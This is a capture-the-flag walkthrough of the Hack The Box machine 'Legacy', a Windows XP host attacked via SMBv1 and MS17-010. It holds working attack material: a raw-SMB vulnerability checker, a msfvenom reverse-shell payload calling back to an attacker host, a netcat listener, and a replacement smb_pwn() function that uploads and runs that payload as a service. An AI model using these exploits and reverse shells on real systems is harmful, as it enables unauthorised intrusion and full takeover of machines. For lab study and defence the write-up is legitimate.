Legacy

IP

10.10.10.4

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.4 | grep '^[0-9]' | cut -d '/' -f1 | tr '\n' ','

we have the following ports open

135,139,445

let's run a more in-depth scan of these ports

sudo nmap -sCV -p135,139,445 10.10.10.4 -oA nmap_results

results

Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-19 07:17 EST
Nmap scan report for 10.10.10.4
Host is up (0.025s latency).

PORT    STATE SERVICE     VERSION
135/tcp open  msrpc       Microsoft Windows RPC
139/tcp open  netbios-ssn Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2023-12-24T16:15:43+02:00
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:4b:1c (VMware)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 5d00h57m40s, deviation: 1h24m50s, median: 4d23h57m40s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.95 seconds

Looks like we are dealing with an old Windows XP machine. Note the "Protocol negotiation failed (SMB2)" line: the host speaks SMBv1 only, which is exactly what the classic SMB exploits need. This should be fun.

Let's start with SMB.

First, let's check whether anonymous (null-session) authentication is accepted:

crackmapexec smb 10.10.10.4 -u anonymous -p ''

After some quick googling, we can see that an SMBv1-only Windows XP host is a prime candidate for MS08-067 (NetAPI) and MS17-010 (EternalBlue). With this knowledge, let's see if we can exploit the target.

Let's clone the following repo (its scripts need Python 2 and impacket):

git clone https://github.com/worawit/MS17-010.git

To confirm our suspicions, we can run checker.py against the target. Besides the patched/unpatched verdict it lists which named pipes are reachable over the anonymous session, which is what zzz_exploit.py needs to pick a pipe.

python2 checker.py 10.10.10.4
  • which it is indeed: the target is unpatched
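What checker.py does on the wire, as an added example written for this page (not code from the worawit/MS17-010 repository): the same SMBv1 probe that nmap's smb-vuln-ms17-010 script and the Metasploit checker use. It negotiates the NT LM 0.12 dialect, opens an anonymous session, connects to IPC$ and sends an SMB_COM_TRANSACTION PeekNamedPipe against FID 0; an unpatched srv.sys answers STATUS_INSUFF_SERVER_RESOURCES (0xC0000205), while a patched one answers STATUS_INVALID_HANDLE or STATUS_ACCESS_DENIED. The packet-building helpers, the default target 10.10.10.4 and the status-to-verdict mapping are this example's own choices; it needs only the Python 3 standard library.

```python
#!/usr/bin/env python3
"""Minimal MS17-010 probe over raw SMBv1 (added example, not the worawit/MS17-010 code)."""
import socket
import struct
import sys

STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205   # unpatched srv.sys (vulnerable)
STATUS_INVALID_HANDLE = 0xC0000008            # patched
STATUS_ACCESS_DENIED = 0xC0000022             # patched

SMB_COM_TRANSACTION = 0x25
SMB_COM_NEGOTIATE = 0x72
SMB_COM_SESSION_SETUP_ANDX = 0x73
SMB_COM_TREE_CONNECT_ANDX = 0x75
TRANS_PEEK_NMPIPE = 0x23


def smb_header(command, status=0, tid=0, uid=0, mid=1):
    """32-byte SMBv1 header. flags 0x18 = canonical, case-insensitive paths;
    flags2 0x4001 = 32-bit NT status codes + long names (no Unicode strings)."""
    return struct.pack('<4sBIBHHQHHHHH', b'\xffSMB', command, status, 0x18, 0x4001,
                       0, 0, 0, tid, 0, uid, mid)


def nt_status(smb):
    """NT status lives at offset 5 of the SMB header."""
    return struct.unpack_from('<I', smb, 5)[0]


def header_ids(smb):
    """(TID, UID) of a response header, needed for the follow-up requests."""
    tid, _pid, uid = struct.unpack_from('<HHH', smb, 24)
    return tid, uid


def negotiate_body():
    dialects = b'\x02NT LM 0.12\x00'
    return b'\x00' + struct.pack('<H', len(dialects)) + dialects   # WordCount 0


def session_setup_body():
    # AndX none, MaxBuffer 4356, MaxMpx 1, VcNumber 0, SessionKey 0, OEM password
    # length 1 (a single NUL = anonymous), no Unicode password, caps NT_SMBS|STATUS32.
    words = struct.pack('<BBHHHHIHHII', 0xff, 0, 0, 4356, 1, 0, 0, 1, 0, 0, 0x50)
    data = b'\x00' * 5   # password, account, domain, native OS, native LanMan: all empty
    return bytes([13]) + words + struct.pack('<H', len(data)) + data


def tree_connect_body(host):
    path = ('\\\\%s\\IPC$' % host).encode() + b'\x00'
    data = b'\x00' + path + b'?????\x00'             # empty password, share path, any service
    words = struct.pack('<BBHHH', 0xff, 0, 0, 0, 1)  # AndX none, flags 0, password length 1
    return bytes([4]) + words + struct.pack('<H', len(data)) + data


def peek_named_pipe_body(fid=0):
    name = b'\\PIPE\\\x00'
    # parameter/data offsets count from the SMB header: 32 hdr + 1 wordcount + 32 words + 2 bytecount + name
    offset = 32 + 1 + 32 + 2 + len(name)
    words = struct.pack('<HHHHBBHIHHHHHBBHH',
                        0, 0, 0xffff, 0xffff,   # total param/data count, max param/data count
                        0, 0, 0, 0, 0,          # max setup, reserved, flags, timeout, reserved
                        0, offset, 0, offset,   # param count/offset, data count/offset
                        2, 0,                   # setup count, reserved
                        TRANS_PEEK_NMPIPE, fid) # setup words: subcommand, FID
    return bytes([16]) + words + struct.pack('<H', len(name)) + name


def verdict(status):
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return 'vulnerable'
    if status in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        return 'patched'
    return 'unknown (0x%08x)' % status


def _recv_exact(sock, n):
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError('connection closed by peer')
        buf += chunk
    return buf


def exchange(sock, smb):
    """Send one SMB message in a NetBIOS session frame and return the SMB reply."""
    sock.sendall(b'\x00' + len(smb).to_bytes(3, 'big') + smb)
    length = int.from_bytes(_recv_exact(sock, 4)[1:], 'big')
    return _recv_exact(sock, length)


def check_ms17_010(host, port=445, timeout=5):
    with socket.create_connection((host, port), timeout=timeout) as s:
        exchange(s, smb_header(SMB_COM_NEGOTIATE) + negotiate_body())
        ss = exchange(s, smb_header(SMB_COM_SESSION_SETUP_ANDX) + session_setup_body())
        if nt_status(ss) != 0:
            raise RuntimeError('anonymous session refused: 0x%08x' % nt_status(ss))
        _tid, uid = header_ids(ss)
        tc = exchange(s, smb_header(SMB_COM_TREE_CONNECT_ANDX, uid=uid) + tree_connect_body(host))
        if nt_status(tc) != 0:
            raise RuntimeError('IPC$ tree connect failed: 0x%08x' % nt_status(tc))
        tid, _uid = header_ids(tc)
        reply = exchange(s, smb_header(SMB_COM_TRANSACTION, tid=tid, uid=uid) + peek_named_pipe_body())
        return verdict(nt_status(reply))


if __name__ == '__main__':
    print(check_ms17_010(sys.argv[1] if len(sys.argv) > 1 else '10.10.10.4'))
```

Run it as `python3 ms17_check.py 10.10.10.4`. It raises instead of guessing when the host refuses the anonymous session or the IPC$ connect, since the verdict is only meaningful once the PeekNamedPipe request actually reaches srv.sys. Unlike checker.py it does not enumerate named pipes, so it tells you whether the host is unpatched but not which pipe to hand to zzz_exploit.py.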

Now we just need to exploit the target. Note that zzz_exploit.py as shipped does not give us a shell: its smb_pwn() function only creates c:\pwned.txt as proof of code execution, so we have to edit that function to deliver our own payload. The script takes an optional second argument naming the pipe to use (one of those checker.py reported).

python2 zzz_exploit.py 10.10.10.4

Now let's create our own reverse shell payload, place it on the target and listen for the incoming connection to establish a shell.

  1. Create the reverse shell payload. The exe-service format matters: the exploit will start the binary as a Windows service, and a plain exe would be killed by the service control manager before we get a stable shell.

msfvenom -p windows/shell_reverse_tcp -f exe-service lhost=10.10.14.6 lport=9001 -o shrek123.exe
  2. Start a nc listener

rlwrap -cAr nc -lvnp 9001
  3. Upload and execute the file on the target system
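The last step is where the stock zzz_exploit.py stops short: its smb_pwn() only drops c:\pwned.txt. The function below is an added example, not the repository's own code, of the smb_pwn() you would paste into zzz_exploit.py so that it uploads the msfvenom payload over the C$ share and starts it as a service. It relies on two helpers that already exist in zzz_exploit.py, smb_send_file(smbConn, localSrc, remoteDrive, remotePath) and service_exec(conn, cmd); the payload file names, the upload path under C$, and the send_file/run keyword arguments (there only so the function can be exercised outside the repo) are this example's own assumptions.

```python
# Replacement smb_pwn() for worawit's zzz_exploit.py (added example, not the repo's code).
# Paste it over the stock smb_pwn(); smb_send_file() and service_exec() are already
# defined in that file, and the keyword arguments below default to them.

LOCAL_PAYLOAD = 'shrek123.exe'   # msfvenom -f exe-service output (assumed to sit next to the script)
REMOTE_DRIVE = 'C'               # uploaded through the C$ admin share
REMOTE_PATH = '/shrek123.exe'    # path relative to the drive root (assumed location)


def smb_pwn(conn, arch, send_file=None, run=None, local=LOCAL_PAYLOAD, remote=REMOTE_PATH):
    """Called by zzz_exploit.py once the kernel exploit has granted SYSTEM over the SMB session."""
    send_file = send_file or smb_send_file   # zzz_exploit.py: smb_send_file(smbConn, localSrc, remoteDrive, remotePath)
    run = run or service_exec                # zzz_exploit.py: service_exec(conn, cmd) creates and starts a service
    smbConn = conn.get_smbconnection()
    print('uploading %s to %s:%s (target arch %s)' % (local, REMOTE_DRIVE, remote, arch))
    send_file(smbConn, local, REMOTE_DRIVE, remote)
    # service_exec() starts the binary as a service: a plain exe would be killed by the
    # SCM within seconds, which is why the payload was built with -f exe-service.
    cmd = REMOTE_DRIVE + ':' + remote.replace('/', '\\')
    print('starting %s as a service; check the nc listener' % cmd)
    run(conn, cmd)
    return cmd
```

After replacing the function, start the nc listener first and then run `python2 zzz_exploit.py 10.10.10.4`; the service start is what triggers the callback. Delete the uploaded binary from C:\ once you are done, since the exploit leaves it on disk.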
